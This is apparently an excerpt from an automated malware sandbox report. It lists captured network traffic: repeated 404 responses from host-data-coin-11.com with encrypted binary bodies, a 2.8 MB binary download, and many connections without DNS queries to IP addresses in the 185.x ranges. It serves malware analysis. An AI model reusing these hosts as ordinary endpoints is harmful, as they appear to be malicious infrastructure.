                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:51 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:55 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:55 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1fI:82OI%70
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 30I:82OTevg]fdP0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:57 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:59 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:15:59 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 29I:82OU:@Rw0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:02 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:02 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 62 6e b8 57 df ef 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 30I:82OTevbnWfdP0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:03 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:03 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 60 4d 87 33 c5 de 66 b2 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 30I:82OTev`M3fdP0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:06 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:06 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Thu, 13 Jan 2022 23:16:07 GMT
                              Content-Type: text/html; charset=iso-8859-1
                              Content-Length: 276
                              Connection: keep-alive
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:08 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:08 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:11 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:12 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 02 0a c1 54 a3 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 2dI:82OU:@RwT,/0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Thu, 13 Jan 2022 23:16:14 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Thu, 13 Jan 2022 23:16:23 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 2828315
                              Connection: keep-alive
                              Last-Modified: Fri, 07 Jan 2022 23:09:57 GMT
                              ETag: "61d8c845-2b281b"
                              Accept-Ranges: bytes
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
